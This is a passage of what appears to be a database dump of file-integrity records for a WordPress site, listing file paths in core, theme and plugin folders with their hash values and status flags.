(0x7e46a3cce3ab8e3e6479ecd06a8b0f13, 'wp-includes/css/jquery-ui-dialog-rtl.min.css', 1, 0x00000000000000000000000000000000, 0xd438f2be1ff29ca5faf2b3c05924df44, 0x1d291a704374c513c5e6a70e70d0800d881a652521e29f54bcbc61f7f448fa68, '', 0, '?'),
(0x7e56a9dc58615d1e148b193770937c52, 'wp-includes/class-wp-post-type.php', 1, 0x00000000000000000000000000000000, 0x61b542405c5a6d50de0b21a8e0883055, 0xf6750432bbadcb4f1849714cd83f723fb9f3692d258224a9ebaab75f4c54a9d7, '', 0, '?'),
(0x7e5c45ad4e04efd88984c480c3a7b3a5, 'wp-content/plugins/revslider/public/assets/assets/svg/device/ic_access_alarm_24px.svg', 0, 0xcfcef8bcf2de273438963b3b7138b840, 0xcfcef8bcf2de273438963b3b7138b840, 0x7f558b09beef1ce5b1f82222d8ba8da948b28bd11fb12d09b84aa73df204b370, '', 0, '?'),
(0x7e5d09da2c24cfefbd2be60794a3d357, 'wp-content/themes/Impreza/framework/templates/blog/single-post.php', 0, 0xb66eb667d34133a0b4f456c1d4d13498, 0xb66eb667d34133a0b4f456c1d4d13498, 0xedd23b3fe0ca29df67f974c30a2e5ae5ef61ab2978c80da0b12f0073580c5a20, '', 0, '?'),
(0x7e69b0491e13d23bddad5d9c41bbc853, 'wp-content/plugins/wordfence/vendor/wordfence/wf-waf/src/cacert.pem', 1, 0x00000000000000000000000000000000, 0x3534d313d50be293bfee609e8e96ab9e, 0x44afa94f6f3b6f8d4f115d2bee9f0800cff0c91935ca5d2f22cadeb826eb51b1, '', 0, '?'),
(0x7e71e649509e490f99baed1772f1c4f6, 'wp-includes/js/dist/vendor/wp-polyfill-node-contains.min.js', 1, 0x00000000000000000000000000000000, 0xb32d5cea64b4fd156f47c0ec0a9d8532, 0x531c6129fab4aba5ca976e7f264294f35612807ed1dc3131fc0227771d168128, '', 0, '?'),
(0x7e7de27b20ddc7193e44ed7d08a63c1c, 'wp-admin/css/code-editor.min.css', 1, 0x00000000000000000000000000000000, 0x4f2bbc906ad777689f33ed3a8e11de4e, 0x7d632fe6d9968029ad8fa144654bc8e8784f64487c870835705b5be56e0ccbf0, '', 0, '?'),
(0x7e91a1520e654f588766329414f16080, 'wp-includes/class-wp-post.php', 1, 0x00000000000000000000000000000000, 0x4fad509b862fea0d3fef53dea4f609a3, 0x975be23f3e9543fbc43d18c3eb46ce0f511b362e446f6890132aadb71987b05e, '', 0, '?'),
(0x7ec4678e3182981040e708bed90e32f4, 'wp-content/plugins/revslider/public/assets/assets/svg/action/ic_all_out_24px.svg', 0, 0x058d933776e9a31fa0221251140be035, 0x058d933776e9a31fa0221251140be035, 0x5017a55903e537c5fe570137d736e45e1426fe98e2e9d396ec91ae401d9a4f65, '', 0, '?'),
(0x7ec5a5cf147300cc3179ec24914c7d68, 'wp-config-sample.php', 0, 0x3e42b983e0b6999d40027bada5f512e7, 0x3e42b983e0b6999d40027bada5f512e7, 0xfb4f197eda306cfbfc16fe20d41143f6d722bacef490b9089b920fd041c1aed6, '', 0, '?'),
(0x7ec5d3b86263f6dd1a24904024a9f22a, 'wp-content/plugins/wordfence/vendor/composer/autoload_real.php', 1, 0x00000000000000000000000000000000, 0x2b183e722a9093b1149a11f708f46d49, 0x45cdf200db2eae9da2acf2c2bfc2afad3146fb284466a77507ca76dceab2cb94, '', 0, '?'),
(0x7ece08457526bc363c9c65b157566f56, 'wp-content/plugins/revslider/public/assets/assets/svg/busy-icons-svg/user02.svg', 0, 0xe4765ec10cae0161700132a2da5ce01f, 0xe4765ec10cae0161700132a2da5ce01f, 0x415eaf19c0c1b5f0792905d65878bb2fa23fc007df70f4fe939b6fb863d44acc, '', 0, '?'),
(0x7eeacf18d119f6581a8cd366db3ab3ba, 'wp-content/plugins/js_composer/assets/vc/vc-element-icons/element-icon-pageable-container.svg', 0, 0xf9e53148a157ea583a4f6e5b45d4dded, 0xf9e53148a157ea583a4f6e5b45d4dded, 0x4d7ad70dcd4e240201e74514ddfa66a85229503abedec8f5f19ca6c777e4c90e, '', 0, '?'),
(0x7f13c36c641b114bf18cd0bcc9ecc7e0, 'wp-includes/js/dist/components.js', 1, 0x00000000000000000000000000000000, 0x2b6a7f7c36df118e1fa6c53674607fe5, 0x214107c8959433d15cd1a9ed18f17263c8b1206dd5b123e8cb995ba66a49f939, '', 0, '?'),
(0x7f16f7dffbd792d9a099522e878d4797, 'wp-content/plugins/revslider/public/assets/assets/svg/editor/ic_wrap_text_24px.svg', 0, 0x48997001684030a39b1cba12c873db63, 0x48997001684030a39b1cba12c873db63, 0xdee4df54414d16db6f99b9703e29dcb7cf4601a5e805a49f883991d8b3710a63, '', 0, '?'),
(0x7f1b9a616032603afcbefeaf0d5da60d, 'wp-content/plugins/Ultimate_VC_Addons/params/Ultimate_BoxShadow.php', 0, 0xe5d9616f49ec9afab1d4f08ada7919de, 0xe5d9616f49ec9afab1d4f08ada7919de, 0x8354af6f3fd8e51c2003131573b24aed45446b89775bce74202b720c4f3e1c2f, '', 0, '?'),
(0x7f30c7d2522981a42fe44b9010228dad, 'wp-content/plugins/revslider/admin/assets/css/index.php', 0, 0xd41d8cd98f00b204e9800998ecf8427e, 0xd41d8cd98f00b204e9800998ecf8427e, 0xe3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855, '', 0, '?'),
(0x7f40f43d7b261508c0b2db05a47dc95f, 'wp-content/plugins/wordfence/modules/login-security/classes/controller/ajax.php', 1, 0x00000000000000000000000000000000, 0x0508afaa7f6693c5b4e5159a0b11537a, 0x4c3f54605e5db33d23e37c222f96bf8bfe1a486d3a89b8baf82fc87748dae51c, '', 0, '?'),
(0x7f699356f52a51e7abb1675da68743b0, 'wp-content/themes/Impreza/framework/admin/functions/updater.php', 0, 0xc119e46efa8ebb93daa50a4394ba4566, 0xc119e46efa8ebb93daa50a4394ba4566, 0x3838202a094b6667531f4d963cc32a0e6e25b1e6f1f62b13dbd049d1de7c67e8, '', 0, '?'),
(0x7f6a2686c25efbccf88c62b3f4048c98, 'wp-includes/ms-settings.php', 1, 0x00000000000000000000000000000000, 0xef0a6bbc4b78ebada3f70ddc088f5938, 0x05ae89bff258c7090d48c7d86bb192d14fdccaf061c00be0a2342915ef7dad95, '', 0, '?'),
(0x7f6a5e14b5b3534ead2d154ff320fd1e, 'wp-includes/css/dist/components/style.css', 1, 0x00000000000000000000000000000000, 0x90d3b8307d3d10eedac6ef17ade705d0, 0x7787a59dac41ca8608a0ff0e28a347f8cf724f469fcebc66b6f8a70909d2e7a3, '', 0, '?'),
(0x7f7790e175bc2cf9fff144fdc2f7b525, 'wp-content/plugins/js_composer/assets/vc/vc-element-icons/element-icon-post-author.svg', 0, 0x244cf4bcf8eb5a6674566e1d069438e1, 0x244cf4bcf8eb5a6674566e1d069438e1, 0x224698664e10c05e9a91de03b1369d460efbc69d7832d3aab4c1b78629458e76, '', 0, '?'),
(0x7f77b4279c5065befa46c32bf5905600, 'wp-includes/Requests/Proxy/HTTP.php', 1, 0x00000000000000000000000000000000, 0xffd0e62f32db05bdbda6bca407d7f029, 0x4ad03664a2e34197cb6c7b9dc1d0991c1700b69f819b051f83df4aedaff7ee68, '', 0, '?'),
(0x7fc1da25475d661dd340cd25ca5adccd, 'wp-content/plugins/wordfence/views/common/section-subtitle.php', 1, 0x00000000000000000000000000000000, 0xfa4b01e163a6db44b5f8c383a4c2dbac, 0x5a9e4aa09e77736835ca4db4fed0edab15b645752f6a678f5b898b19c62de8c1, '', 0, '?'),
(0x7fcaebe71a99d9da44be0dc9ac7303c8, 'wp-content/themes/Impreza/framework/config/grid-templates.php', 0, 0x62267a034b30cfa73cac92d37de8d3a9, 0x62267a034b30cfa73cac92d37de8d3a9, 0x5a43e6d12f42d13fca03f9596c54be1bd5aaadb59739f7ecf7e2190469e1e6f5, '', 0, '?'),
(0x7fd80bd0a1714406d69a3fd31e699e58, 'wp-content/plugins/wordfence/vendor/wordfence/wf-waf/src/lib/utils.php', 1, 0x00000000000000000000000000000000, 0x0dfd962128c4692e2bf629d29ac9227b, 0xe75aa0515ba6a706a451991dd1c647a0b5bcf180370e10efe2fd19d88d45229e, '', 0, '?'),
(0x7fdb4bfb51f07d1455263b2698efd851, 'wp-includes/meta.php', 1, 0x00000000000000000000000000000000, 0x7f4592c300380eb439f5f41d6d3d0209, 0x82411ea1dce740ebd368c56cedd1868b9b273dcd420e80f8077f2e67ff295f3a, '', 0, '?'),
(0x7fe674721eb3ceb5461b5fee20c3c7d7, 'wp-includes/js/wp-emoji-loader.js', 1, 0x00000000000000000000000000000000, 0xfe59084e6bc4be1624a6d93df4e63e17, 0x3bd18768dfeecc7a1f872361b522ae374b8e2e201b29f83abae1d978f5869c3c, '', 0, '?'),
(0x7fffcd8ddadb199fbd81cf811b628542, 'wp-content/plugins/wordfence/crypto/vendor/paragonie/sodium_compat/src/Core/Ed25519.php', 1, 0x00000000000000000000000000000000, 0x497f25b2309e5ccff2f64cfeed2dfbb5, 0x6268038070f2bf7076d7b4bfc14f81237520cd352f3df8ba021839c58829dfe4, '', 0, '?'),
(0x800dbfec1cc839ed10b7b932e7ac1e5b, 'wp-content/plugins/revslider/public/assets/assets/svg/busy-icons-svg/chart15.svg', 0, 0x78af28a9f452b0424fffe32c2c2919cb, 0x78af28a9f452b0424fffe32c2c2919cb, 0xb8924b6294f4789db0fc18fc817e4d6aa592c0ac1b0b513279548fc5145031da, '', 0, '?'),
(0x80229dd18b573d2fca96bac7c9d15080, 'wp-content/themes/Impreza/js/theme.js', 0, 0xfb17eef6196b541852790a5e190e7f89, 0xfb17eef6196b541852790a5e190e7f89, 0x05cc01a04ee13328562ab951a3a840fa550eb4272aa2393d884b6ef65357275b, '', 0, '?'),
(0x80332df0e0eaedfffb129566d0f2b60a, 'wp-includes/css/dist/list-reusable-blocks/style-rtl.css', 1, 0x00000000000000000000000000000000, 0x8fc455cde485dbee10fb0d2d21a6e240, 0x8c22800f4fae66e5531c07df80e9220b5d317cc3574a16b6554c2e928dfd14dc, '', 0, '?'),
(0x8036b0b529a3df84c8c068d39602d863, 'wp-content/plugins/revslider/public/assets/assets/svg/image/ic_adjust_24px.svg', 0, 0x2a4be0e83b57f199edd55403c5a87708, 0x2a4be0e83b57f199edd55403c5a87708, 0x5966e6b9ea31ca3e809b104fce37548a233df7eec73e40f1a633c71ffba765da, '', 0, '?'),
(0x803bf1ce2131e13efc590c1bc47851fc, 'wp-includes/js/dist/block-editor.js', 1, 0x00000000000000000000000000000000, 0x3d83c9e397d94fae5c21f7ed3963cd98, 0x5a814de47e331d3b499b47c247869d6804d698d239b4ffd38f47fd43fc2d0be5, '', 0, '?'),
(0x80916168a423d4ed38ed63f19cc20583, 'wp-includes/js/tinymce/themes/inlite/theme.js', 1, 0x00000000000000000000000000000000, 0xf51c77b5905ab12e3ef9c3c2259afcc3, 0x7ad366b3858aeb6cf72091ae07b8c900eeb1b99c7139e3db77a8dbf19bdeaf8b, '', 0, '?'),
(0x80a917f25350d33b5ec6ad1c7a90df49, 'wp-content/plugins/wordfence/lib/conntest.php', 1, 0x00000000000000000000000000000000, 0x93aa710dc68989d5282e0b41cbace9dd, 0x06e8184a266772622b2787ab4964b909311448b1844cdb57eac2f5c47265c34f, '', 0, '?'),
(0x80b697723d8ac4dacf1663c4d0cb4d7a, 'wp-includes/js/dist/is-shallow-equal.min.js', 1, 0x00000000000000000000000000000000, 0x5b6f24bca1ae714a09544545ecfa0591, 0x70f093a88ed0cb461e2ead0414fb62176ad61616a443850a0d2a7f445e433866, '', 0, '?'),
(0x80b98811f4326e38d560b55e1ec02fa5, 'wp-content/themes/Impreza/framework/shortcodes/us_gmaps.php', 0, 0xf80d734f5d96530eaa5dc07617bdc44b, 0xf80d734f5d96530eaa5dc07617bdc44b, 0x01c077c662d9e72b8d167d4bdb579949a198a1a81972cff36717b7e92eb5c9e0, '', 0, '?'),
(0x80c1f932a0a6bb6c5dac7784446e4d48, 'wp-content/plugins/revslider/includes/framework/functions-wordpress.class.php', 0, 0x2a2aad18ca01adafeff652e6082b71b7, 0x2a2aad18ca01adafeff652e6082b71b7, 0x453bb45e0fa042e439bb1d486a44b1f605c101925b438e07547557d293876950, '', 0, '?'),
(0x80cd75f296531c89641fe03070bc50c9, 'wp-content/themes/Impreza/framework/vendor/usof/templates/fields/backup.php', 0, 0xb7c4088bc610a12cdc5d64e8a918d596, 0xb7c4088bc610a12cdc5d64e8a918d596, 0x1ecd54f5af48bb57da86095da6490ef75dcf7e3652d95f17bb5c7bf30e9b3d2d, '', 0, '?'),
(0x80d3dabae8758fb6bf4d97c91df75b0d, 'wp-admin/images/wpspin_light-2x.gif', 1, 0x00000000000000000000000000000000, 0x6d53acfb07ac1bfdd0db79224389c4d2, 0xb0bd36193653af58a8a30fb1b9feb1364f7dc9343e881d70be22c30fa0942731, '', 0, '?'),
(0x80d64e78ef1cf5da891ae33879485c8d, 'wp-admin/js/theme-plugin-editor.min.js', 1, 0x00000000000000000000000000000000, 0xcc1a6596f81f2efc3b0ef5882d8b4d00, 0xf1816d782cfc218354860e255599e00375acd307af4664111d38e56714dfb4ef, '', 0, '?'),
(0x80d673536bdc69ab3c342763ec2d1336, 'wp-includes/js/wp-embed.js', 1, 0x00000000000000000000000000000000, 0x23e24e824f384c5eb11e73576b4ac93c, 0xbc9820f919459f10f0bdbb3ee9b2405fd630b39bc52112cc4207b594fed7350f, '', 0, '?'),
(0x80f706eaff65d8070ee63937e3614a53, 'wp-includes/images/smilies/icon_smile.gif', 1, 0x00000000000000000000000000000000, 0xe3e033f32e291fc0328deadd70ebcef0, 0xcba0eb8a222cebb652caa8a80654723da66fc205f972d102d0973ab503c1b080, '', 0, '?'),
(0x8112f958518dfbe1643972d7dabc96db, 'wp-includes/customize/class-wp-customize-themes-section.php', 1, 0x00000000000000000000000000000000, 0x32f1634244d0a7cafc32b9d61819d4d6, 0x8a0f798ea18fa2978caf2c3b71166f2964f9afce38a6012e4780523bbec72e52, '', 0, '?'),
(0x8128abd5a6cc82cb570fd01102eaa7b7, 'wp-content/plugins/revslider/public/assets/assets/svg/notification/ic_sync_problem_24px.svg', 0, 0x9704a40aa3e280c2b6771664dfbb4d79, 0x9704a40aa3e280c2b6771664dfbb4d79, 0x813da264a952985d3d3c86c98377f21bc6b0ddccd05956b4ea66dd5aa81a3f9c, '', 0, '?'),
(0x813ad01ab9920b5388c82117330199c8, 'wp-content/plugins/js_composer/config/templates.php', 0, 0x0cbcbd45296ee1a697eb2102faa7aef6, 0x0cbcbd45296ee1a697eb2102faa7aef6, 0x8f39e397070b24c2db10f6c5a6d8748a425ef98cdcae600386f2781b2cda60e4, '', 0, '?'),
(0x81533372107f3d80261e73767340a9d1, 'wp-content/themes/Impreza/framework/templates/page.php', 0, 0x1280dec098306d62d03da0ee711508f8, 0x1280dec098306d62d03da0ee711508f8, 0x57dd780b94ae93ba0ca2e47722a4e854153765abde74f866f7250a97b64a1ce4, '', 0, '?'),
(0x8158db9b8ae036fd901dcac0fd6c05dd, 'wp-content/plugins/revslider/public/assets/assets/svg/content/ic_report_24px.svg', 0, 0xa1f47b772e707b4573cbebac2178f0a3, 0xa1f47b772e707b4573cbebac2178f0a3, 0x69a4ca632e0bc95cefecd26b20723bcbf098b38d3b5155edd4dfc388359fa30e, '', 0, '?'),
(0x8164a737dac6e316d4d35863f0c4a83f, 'wp-content/plugins/js_composer/include/classes/shortcodes/vc-gitem-col.php', 0, 0xceef72603c778467cc24421f74abc4ce, 0xceef72603c778467cc24421f74abc4ce, 0x8c7240563f43ad5026eb5c476b392c4f0e2d2ec3a60e85cbe2c9495762f7d2c5, '', 0, '?'),
(0x81656cf704358f73989845efc3ba51e2, 'wp-admin/js/media-upload.min.js', 1, 0x00000000000000000000000000000000, 0x3427781751e43fa30defb3c3686e0f4f, 0x06f761c60c494bab4dda767dcea3dc8e1496ab87a3fb0a868da7335407258886, '', 0, '?'),
(0x817714b4b040bc2ad4eae6212eaa91a7, 'wp-content/plugins/js_composer/assets/lib/bower/flexslider/jquery.flexslider-min.js', 0, 0x866fe370b8ff31e6547f5e0ce74f1def, 0x866fe370b8ff31e6547f5e0ce74f1def, 0xe1d4e7a167418d5ed287ef63c238e2ba7f06a98a12a238973f11b3a988620908, '', 0, '?'),
(0x8185032c43551c55eee80b9cfa39692d, 'wp-includes/css/wp-auth-check.css', 1, 0x00000000000000000000000000000000, 0x8868ded3f5e30dbaec5dbcb7bc104b0f, 0x96d5d086483454a50fc56151279b3335e9ef8ad5b772d225e302c4c9c6556537, '', 0, '?'),
(0x81949986e99fd3ab5b97092a58969803, 'wp-content/plugins/Ultimate_VC_Addons/assets/js/jquery-ui-effect.js', 0, 0xb202db84210295c98a8d2d73ad9a6e37, 0xb202db84210295c98a8d2d73ad9a6e37, 0xacc31db1c3116fd869773e8fae88ed19690f1d9070cb9cf7b972c52fbbc1071b, '', 0, '?'),
(0x81b069e4a01a21e017145bab382422f8, 'wp-content/plugins/wordfence/vendor/maxmind-db/reader/LICENSE', 1, 0x00000000000000000000000000000000, 0x3b83ef96387f14655fc854ddc3c6bd57, 0xddacef491153f45022f5619519bb2016374a8c36e75153768493f45fb38d7992, '', 0, '?'),
(0x81c889563f09dd13de1701135dc62941, 'wp-includes/js/media-views.js', 1, 0x00000000000000000000000000000000, 0x98135834eef3a3a00ae7c6e99457110e, 0x37d8d12e9db75ef3c7b325f6a0ca696ee2503403c42fd667005f5bd1eaaabbae, '', 0, '?'),
(0x81cb6e33284133c21701c15fb49df68e, 'wp-content/plugins/wp-super-cache/languages/wp-super-cache-ro_RO.po', 1, 0x00000000000000000000000000000000, 0xfcb876ab4e131fd70824ef7a8601e589, 0x052079337faccd291b6b001f35df0c7ecf5b77d1a43da80de8ec92bce9cb0451, '', 0, '?'),
(0x81cec25781dae8f73db6d4984864fb7a, 'wp-includes/class-wp-site-query.php', 1, 0x00000000000000000000000000000000, 0xee1e7152c7176ea64422c813eac580ad, 0xd10c0ac3f8260747ce42fbe04e8ecc6b2d3a31b3dd5425c1b7e1e1d51a7b8351, '', 0, '?'),
(0x81cf7bffd9b2cd8e4b90ef8edb331727, 'wp-content/plugins/js_composer/include/params/vc_grid_item/editor/popups/class-vc-add-element-box-grid-item.php', 0, 0x64a4d7717d518dfa3ce3ce198a98352b, 0x64a4d7717d518dfa3ce3ce198a98352b, 0x6f2da05ba384f780b25c54abdd3f200cabb939f11ebe9d8c85b9305826c51177, '', 0, '?'),
(0x81d558f9e2cfe02d9f34a44afc5f8333, 'wp-content/plugins/wordfence/lib/wordfenceHash.php', 1, 0x00000000000000000000000000000000, 0x53c0e1731b41c4576cd4a69c9a45026d, 0xfcb4e18e9a95592fa2e47c8e0e720bd1f06f19e91ff63f0b7ae0a221176336d5, '', 0, '?'),
(0x81d60d8f0a27276fa6c2cf87f8f94d67, 'wp-content/plugins/js_composer/config/content/shortcode-vc-posts-slider.php', 0, 0x3b19505948facd455ee358452ff8b9b4, 0x3b19505948facd455ee358452ff8b9b4, 0x39efdbdf07edbe97aeee146b40d71654d7bbc663fb87c1182ed023d02a8917ba, '', 0, '?'),
(0x81d6f084cb273e02e15b01bd9ece87f7, 'wp-admin/js/user-profile.js', 1, 0x00000000000000000000000000000000, 0x415a0ae2d0ac703d2570ed209e058118, 0xb6fd18099bc6999c2320506796995de7f0b1cf96219c0ba1a6f082d2bfcbfd5d, '', 0, '?'),
(0x81e1a0628af378c796e34fc45a9e3c43, 'wp-content/plugins/revslider/public/assets/assets/svg/busy-icons-svg/factory.svg', 0, 0x59367ff221f22c5eb19bdb3148500a50, 0x59367ff221f22c5eb19bdb3148500a50, 0x1fee7e08d9e0d48674e75c49c1ab15f70295d351506428d434439315e41ac60d, '', 0, '?'),
(0x81ec11b650641fbab593fd92ed638133, 'wp-content/plugins/wordfence/vendor/wordfence/wf-waf/src/lib/http.php', 1, 0x00000000000000000000000000000000, 0x3cc9690c04a32210c04b4e58cf2cebc1, 0xe01dbf0443d19db8e281aab10e72a80ecd2b9c92a3f25e128f59686a7a13c85a, '', 0, '?'),
(0x81ed3e73bea7eefd80fcc04813e0b288, 'wp-content/plugins/js_composer/include/templates/pages/partials/vc-roles-parts/_grid_builder.tpl.php', 0, 0x0fb51189e6e6771a8803f7ba1a846de1, 0x0fb51189e6e6771a8803f7ba1a846de1, 0x0b55d93a2a27d56603a9f0ea09cdd4c263042b5d4af36f9e98408ac74d7083c1, '', 0, '?'),
(0x82014fcd135815ebc1675d0b3c664098, 'wp-admin/css/farbtastic-rtl.min.css', 1, 0x00000000000000000000000000000000, 0xd55340e3ce5b935c2cf0337c92b61521, 0xa3536d11be27df3b646097e365a04dd830693df38e3f3eced00780e4bc3f0f7b, '', 0, '?'),
(0x821133a496c6876515c728c3ba39f911, 'wp-includes/js/jquery/suggest.min.js', 1, 0x00000000000000000000000000000000, 0x7311075c2b411b299c94e36e2e3bab89, 0x0e493cbf127b0034af609c8f3c216a92b15a38eb8fb2e801bb4494480f57ff95, '', 0, '?'),
(0x82121d9a11c6327ba139542c57252147, 'wp-content/plugins/revslider/includes/framework/functions.class.php', 0, 0xa7fb2e91d7ae91f41997a42bd2b72515, 0xa7fb2e91d7ae91f41997a42bd2b72515, 0xa79237710a6ef53634b6113162c16ed2cc0eb384bf8ec1857530dba73c701ffd, '', 0, '?'),
(0x8216d41dbb79642b300e79f3609ae828, 'wp-content/plugins/js_composer/include/templates/shortcodes/vc_wp_posts.php', 0, 0x989fad1d9a9e32edec9af4e7cdfa29e3, 0x989fad1d9a9e32edec9af4e7cdfa29e3, 0x6b83b2a632e1ae3f7d6922680e75331e4c0975ea9e73f4dc1ef2425d68ad5e7c, '', 0, '?'),
(0x821ffd5ccf28e5d97742eac44912e39d, 'wp-admin/network/update.php', 1, 0x00000000000000000000000000000000, 0x99be6fcb45a3da4e5246399f9d7a38f0, 0xf82411f9adea1575f397a72d7f11423f79d54e77d48276afd2873db365f2db2c, '', 0, '?'),
(0x8226aeeb7669275ec64ce8b124f11ecb, 'wp-content/plugins/js_composer/config/deprecated/shortcode-vc-googleplus.php', 0, 0x5a6f01a388c3c10be87362e6b68e306e, 0x5a6f01a388c3c10be87362e6b68e306e, 0x31cb4cc9ef17005ff8991430c7d44c702f3245ea06ebcc58aa7b48738af203e2, '', 0, '?'),
(0x822874546c44ceac372687b34d502ec0, 'wp-includes/js/tinymce/tiny_mce_popup.js', 1, 0x00000000000000000000000000000000, 0x4237af4931ba3003048f8eb5b98364c7, 0x0efbbaa427d09705afb3052f06211adb1f61218e7eb329b5c13144120ce418a1, '', 0, '?'),
(0x822f09c1453a4bf252e5afa5c076028d, 'wp-content/plugins/wordfence/crypto/vendor/paragonie/sodium_compat/src/Core32/X25519.php', 1, 0x00000000000000000000000000000000, 0x009456ceaeaf02fca9c93f99bd936234, 0x3d1eb7dea3dde7c00fdf343af4ad24649e5893578a52ace258a6be8a4e203ee4, '', 0, '?'),
(0x8240df461220d1d3a028a9a4c5652a5b, 'wp-admin/js/theme-plugin-editor.js', 1, 0x00000000000000000000000000000000, 0x53b16e979e15d15b8665a518b3498b6c, 0x0ce2a1082656afc9ab1e915844f132d52bd1378813208eb7e529fe9ae6ed445c, '', 0, '?'),
(0x824204d2f303d987c8763c5376e7a8b3, 'wp-includes/SimplePie/Parse/Date.php', 1, 0x00000000000000000000000000000000, 0xb19b29bca24b81281961370f58c8ab50, 0x4a633d5b29c94b35b2abf0001099962cc9532aff82d5ddfbfcf0b73a4699a600, '', 0, '?'),
(0x82468920e5474aced642ec7f887337b5, 'wp-includes/js/media-models.min.js', 1, 0x00000000000000000000000000000000, 0xa372a9be9eb7e7e3a40e6f8c2bc52573, 0xf8819d5634331e792547c087bc12e83000b83e3213e221ecbb4b029910c7a695, '', 0, '?'),
(0x82573d205c27782288578fcc7deeee64, 'wp-content/plugins/wordfence/crypto/vendor/paragonie/sodium_compat/namespaced/Core/Curve25519/Fe.php', 1, 0x00000000000000000000000000000000, 0xa7b0f7d5a9e84b1bbdad835ee3a5beb9, 0xcf4d89381d103a9f6e61c68b47185add715164c3bd21aea0bcda27879b266731, '', 0, '?'),
(0x825eaf5372a58be7822e7f734f19ba99, 'wp-content/plugins/revslider/public/assets/assets/svg/action/ic_event_seat_24px.svg', 0, 0xacbbb9be30522760c27e4cf80b976836, 0xacbbb9be30522760c27e4cf80b976836, 0x4de0392727878a24fb96d34b1ef728e7d5d20713c71b23ba03aa5ed4d5674b1a, '', 0, '?'),
(0x826fbfa9c1d707eec7f864b0db3c2430, 'wp-content/plugins/Ultimate_VC_Addons/modules/ultimate_hotspot.php', 0, 0x1ead8a718ffe964b0a89c4ab267876b8, 0x1ead8a718ffe964b0a89c4ab267876b8, 0xbdc51ca7b10828607f8f4542a9cbdb9de51c0b5cee56e4a62129aa57ca99912d, '', 0, '?'),
(0x8272a17cf1fc36079d048361821a36dd, 'wp-content/plugins/js_composer/assets/js/frontend_editor/shortcodes/deprecated/vc_carousel.js', 0, 0xfd8c4d370c38e7c579bc885942b81a96, 0xfd8c4d370c38e7c579bc885942b81a96, 0x058d59e81000932e1dbcbf26345a357a0838ca2c3d972ec0e4fa25b20a888e6b, '', 0, '?'),
(0x827780b735bb0bff07efc1a129bafb9e, 'wp-includes/css/wp-embed-template-ie.css', 1, 0x00000000000000000000000000000000, 0xeeb729369ef309d89ed0bc7120aacadf, 0xa06f95b12b385dc55375e7fc482ee943f867f4de5239ea26b62bfda2935c579b, '', 0, '?'),
(0x828e0013b8f3bc1bb22b4f57172b019d, 'index.php', 1, 0x00000000000000000000000000000000, 0xb9142a5f513a565bcb15430f4982000e, 0xd7805da248bcf0ff6fff2685e0590059c9b109c206b6f9b98b05981aeb8e3d4b, '', 0, '?'),
(0x829f2e6b6d224f1474761f0270be0a28, 'wp-content/plugins/Ultimate_VC_Addons/admin/js/bootstrap-datetimepicker.min.js', 0, 0x26c76bfbc22c0594511fc038b24e1362, 0x26c76bfbc22c0594511fc038b24e1362, 0x0f2bc1871acdff071c7747dabc72608d0919868c7e1a9857956b9ad5d64791c0, '', 0, '?'),
(0x82a7ace3ed41bc13cef28c311a853ba4, 'wp-includes/rss.php', 1, 0x00000000000000000000000000000000, 0xc21d6d86e75bef00fa6c4a0ec5e1ca3b, 0xb09003e75e93ba15125dfb2281f015cb8c7c61a93e7cd9c4aab62e80ad704e58, '', 0, '?'),
(0x82de03dbfca42143f9f9030f23c0cc11, 'wp-content/plugins/Ultimate_VC_Addons/admin/debug.php', 0, 0x69e076491169dae9291938ecfe776895, 0x69e076491169dae9291938ecfe776895, 0x8bd45856b4bcce785fd1916843e29580df52823b4fd788dd4b3d3c0fa5912868, '', 0, '?'),
(0x82ec9cfdae76bf410a4772cf33433960, 'wp-admin/includes/class-wp-internal-pointers.php', 1, 0x00000000000000000000000000000000, 0x47cc50adb9708d1e3711cbd5e5741eb4, 0xa01627179e51f3bbc1883fc3d91aa8e7de7dd1609a1f2e38b33b4c5ebb5512c8, '', 0, '?'),
(0x8309fca53864d3974560224dcd14091a, 'wp-content/plugins/js_composer/assets/lib/vc_chart/jquery.vc_chart.min.js', 0, 0x102728ab6c66d3c96a148047e586ca1c, 0x102728ab6c66d3c96a148047e586ca1c, 0x41316f0739d48f595b702618db6b1833898c45f6d9a747c1babcca8694107949, '', 0, '?'),
(0x830a52c6652ec753b605a18ce34786d7, 'wp-content/plugins/js_composer/assets/lib/bower/ace-builds/src-min-noconflict/worker-css.js', 0, 0x1e69ab471211e9827cf69de16d76fc9d, 0x1e69ab471211e9827cf69de16d76fc9d, 0xbee8178e56150ab05c9134a7ebdcc4ae09864d0541c8edbb425bfc191f4ec20c, '', 0, '?'),
(0x830bca151fc2c876e2c7b9320a20f839, 'wp-content/themes/Impreza/framework/templates/elements/post_date.php', 0, 0x0c67d64211d4c773ebeb56bb6ae620c3, 0x0c67d64211d4c773ebeb56bb6ae620c3, 0x2aa921cdbc3020d838aba103ef011e447e473ab8230070a5b0cc1fefd7c91016, '', 0, '?'),
(0x832821f95d4572cf76884bbe0955a438, 'wp-content/plugins/js_composer/include/autoload/params-to-init.php', 0, 0x49bb38e53eebbd8a52a3d576e7d6e5f5, 0x49bb38e53eebbd8a52a3d576e7d6e5f5, 0x919d5210fc7db716fd31c6173273707a1c74bffe9c74aa5974e34e36b6bf2c66, '', 0, '?'),
(0x833438fe2b43872506bdbe97ac285663, 'wp-content/plugins/revslider/public/assets/assets/svg/notification/ic_tap_and_play_24px.svg', 0, 0xa2686ab85fce8ed9bfe8cf4512af411f, 0xa2686ab85fce8ed9bfe8cf4512af411f, 0xe3039349def87cd086a224c1c6a77e84b261edf278c95dfd6d37f0368509246b, '', 0, '?'),
(0x8335b195f536175f82b503176fc71ef0, 'wp-content/plugins/revslider/public/assets/assets/svg/hardware/ic_gamepad_24px.svg', 0, 0x1409b6878c705493133d32c5651a8524, 0x1409b6878c705493133d32c5651a8524, 0x5bb07477ddaba2916a506585573eb7c39c050eb5bdc19363e4a6342758e86109, '', 0, '?'),
(0x833b43b25f8ae1ffcc389da052788384, 'wp-content/plugins/revslider/public/assets/assets/svg/action/ic_visibility_off_24px.svg', 0, 0x2f1c7fc3fa8f6ac295c6ae50fbe6598d, 0x2f1c7fc3fa8f6ac295c6ae50fbe6598d, 0x67357c6885bab1c824dfec4cfc846986f367e06ee1243604c1ab99a867078801, '', 0, '?'),
(0x8345626c388d79c0f61fc37d86a19097, 'wp-includes/js/tinymce/plugins/link/plugin.js', 1, 0x00000000000000000000000000000000, 0xf82a4e04c8926d51b90680aecc07b9c3, 0xc360339f6359518df8c1d9fe3957dead236c01bbf6d670cb532b47ed011cd834, '', 0, '?'),
